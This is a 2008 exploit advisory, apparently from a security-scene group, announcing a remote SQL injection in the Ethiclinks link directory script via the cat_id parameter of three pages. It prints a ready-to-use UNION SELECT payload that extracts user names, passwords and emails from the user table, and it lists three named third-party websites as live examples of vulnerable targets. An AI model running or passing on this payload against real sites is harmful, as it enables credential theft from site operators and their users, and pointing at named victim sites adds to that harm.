Ethiclinks suffers from a remote SQL injection vulnerability.
dc02473a04a77ea4b45f077c01e61d0b3581ba664278b302aecf5f573dd62f0e
[~]-----------------------------------------------------------------------------------------------------------------------------------------------------
[~]
[~] Ethiclinks (link.php?cat_id) (linkdirectory.php?cat_id) (directory-links.php?cat_id) Remote SQL Injection Vulnerability
[~]
[~] http://www.ethiclinks.com/
[~]
[~]
[~] ----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 19.11.2008
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~] ----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] packetstorm staff
[~]-----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/link.php?cat_id=-1 union select 1,2,3,4,5,6,concat(fname,0x3a,password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18 from lp_user_tb/*
[~]
[~]
[~]------------------------------------------------------------------------------------------------------------------------------------------------------
[~]
[~] Example :-
[~]
[~] linkdirectory.php?cat_id= -> http://marketingtnt.com/linkdirectory.php?cat_id=SQL
[~]
[~]
[~] link.php?cat_id= -> http://www.casinoslotsecrets.com/link.php?cat_id=SQL
[~]
[~]
[~] directory-links.php?cat_id= -> http://www.free-traffic-builder.com/directory-links.php?cat_id=SQL
[~]
[~]-------------------------------------------------------------------------------------------------------------------------------------------------------